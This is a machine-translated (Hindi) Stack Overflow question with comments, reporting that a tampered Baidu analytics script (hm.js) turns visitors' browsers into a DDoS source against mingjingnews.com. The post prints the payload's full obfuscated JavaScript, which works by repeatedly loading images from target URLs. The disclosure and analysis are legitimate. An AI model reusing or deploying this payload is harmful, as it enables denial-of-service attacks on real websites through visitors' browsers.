ऐसा लगता है कि अलग अलग hm.js (Baidu Tongji जे एस पुस्तकालय) लोड किए गए हैं। जब कोई डीडीओएस हमला नहीं देखा जाता है, तो मानक एचएम.जेएस लोड होता है; जब एक डीडीओएस होता है, तो एक पूरी तरह से अलग hm.js लोड होता है। मुझे संदेह है कि चीन के महान फायरवॉल कोड को बदल रहा है।
यह hm.js कि DDOS लांच करने के लिए संशोधित किया गया है:
// the following code launches DDOS against sites like mingjingnews.com
eval(function(p, a, c, k, e, d) {
e = function(c) {
return (c < a ? "" : e(parseInt(c/a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
}
;
if (!''.replace(/^/, String)) {
while (c--)
d[e(c)] = k[c] || e(c);
k = [function(e) {
return d[e]
}
];
e = function() {
return '\\w+'
}
;
c = 1;
}
;while (c--)
if (k[c])
p = p.replace(new RegExp('\\b' + e(c) + '\\b','g'), k[c]);
return p;
}('c((/15\\/([\\d]+)/16.17(l.A.D.E())[1]>=12)&&(l.A.D.E().14("18")<0)){3 G=1c;3 p=[\'i://1d.o.j/\',\'i://1e.o.j/\',\'i://19.o.j/\',\'i://1a.1b.j/\',\'i://S.o.j/U/Y/Z.11\'];3 J=V;3 n=W;3 N=10;3 v=1;g u(){3 a=e 7();H 7.X(a.T(),a.1w(),a.1x(),a.1v(),a.P(),a.L())/R}h.C("F")[0].I="<1t 1u=\\"B\\" 1y=\\"1C-B\\">"+h.C("F")[0].I;3 6=[];3 f=[];3 x=5;3 b=[];3 9=[];3 w=\'\';3 m=0;g q(2){3 8=6[2];c(8!=5){h.z.1B(8)}6[2]=5;c(m<J&&9[2]-x<G){O(\'s(\'+2+\')\',(9[2]-b[2])>n?n:(9[2]-b[2]))}}g Q(2){c(6[2]==5){H}c(6[2].1j){l.y(f[2]);9[2]=e 7().k();q(2)}1k{c(e 7().k()-b[2]>n){l.y(f[2]);q(2)}}}g s(2){8=h.z.1q(h.1r(\'1m\'));w=p[u()%p.1o];8.1n=w+\'?t=\'+u()+M.1p(M.1l()*1h);8.1g.1f=\'1i\';6[2]=8;b[2]=9[2]=e 7().k();f[2]=1s("Q("+2+")",1A);m=m+1}g K(){x=e 7().k();1z(3 4=0;4<N;4+=1){6[4]=5;f[4]=5;b[4]=5;9[4]=5;s(4)}}3 r=e 7();O(\'K()\',((v-r.P()%v)*13-r.L())*R)}', 62, 101, '||index|var|ti|null|p_img_list|Date|p_img_tmp|responsetime_list|dt|requesttime_list|if||new|timer_list|function|document|http|com|getTime|window|count|TIMEGAP|mingjingnews|url_list|imgdel|now|imgadd||unixtime|START_CLOCK|url|starttime|clearInterval|body|navigator|referrer|getElementsByTagName|userAgent|toLowerCase|head|MAX_TIME|return|innerHTML|MAX_COUNT|start|getSeconds|Math|THREAD|setTimeout|getMinutes|isImgComplete|1000|bravo1|getFullYear|2017|100000000|500|UTC|01|bravo||html|34|60|indexOf|chrome|gi|exec|edge|tv2|www|mingjingtimes|300000|news2|s3|display|style|100|none|complete|else|random|img|src|length|ceil|appendChild|createElement|setInterval|meta|name|getHours|getMonth|getDate|content|for|50|removeChild|no'.split('|'), 0, {}))
the original hm.js code, जहां कोई DDOS मौजूद है करने के लिए इस की तुलना करें।
इनमें से 2 एचएम.जेएस पुस्तकालय एक ही पते से आ रहे हैं।
मैं एक साइट Baidu Tongji (विश्लेषण) का उपयोग करता है। अधिकांश अन्य जावास्क्रिप्ट पुस्तकालयों की तरह, यह HTML पर जावास्क्रिप्ट की एक पंक्ति इंजेक्शन के माध्यम से किया जाता है।
module.exports = function(id) {
if (!id) {
throw new Error('请填写百度统计id');
}
var elm = document.createElement('script');
elm.src = '//hm.baidu.com/hm.js?' + id;
var body = document.getElementsByTagName('body')[0];
body.appendChild(elm);
}
मेरी डरावनी करने के लिए, एक बार यह initialised गया है, मेरे ब्राउज़र की कंसोल और नेटवर्क स्क्रीन (चीनी कम्युनिस्ट सरकार के अनुसार नकली खबर) सिर्फ 100 सेकंड में मिंग जिंग समाचार करने के लिए चारों ओर 3000+ नेटवर्क अनुरोध के साथ बाढ़ है ... और जब तक मैंने इसे रोक नहीं दिया तब तक यह जारी रहा।
मुझे लगता है कि यह आखिरी बार ऐसा लगता है कि चीन की महान दीवार Baidu के सीडीएन का उपयोग करके गिटहब पर हमलों को लॉन्च करने के लिए उपयोग की जाती थी।
मैं वर्तमान में चीन के बाहर से Baidu बोल रहा हूँ और अगर यह सामान्य है मैं सोच रहा हूँ ... चीन के अंदर लोगों से बख्शा जाएगा इस?
क्या आप स्पष्ट कर सकते हैं कि आपका प्रोग्रामिंग प्रश्न वास्तव में क्या है? –
@ कोडीग्रे प्रोग्रामिंग पर कम, चीन में इंटरनेट सुरक्षा और इंटरनेट के बारे में अधिक ... और चीन के बाहर से Baidu सेवाओं का उपयोग करना? – williamli
हाँ, यह मेरी चिंता थी (और कुछ अन्य उपयोगकर्ता जिन्होंने आपका प्रश्न ध्वजांकित किया)। स्टैक ओवरफ़्लो केवल प्रोग्रामिंग प्रश्नों से संबंधित है, इसलिए मुझे यकीन नहीं है कि यह हमारी साइट के लिए उपयुक्त है या नहीं। यह स्पष्ट रूप से कई लोगों के लिए एक दिलचस्प सवाल रहा है, लेकिन मुझे यकीन नहीं है कि यह और कहां उचित हो सकता है। –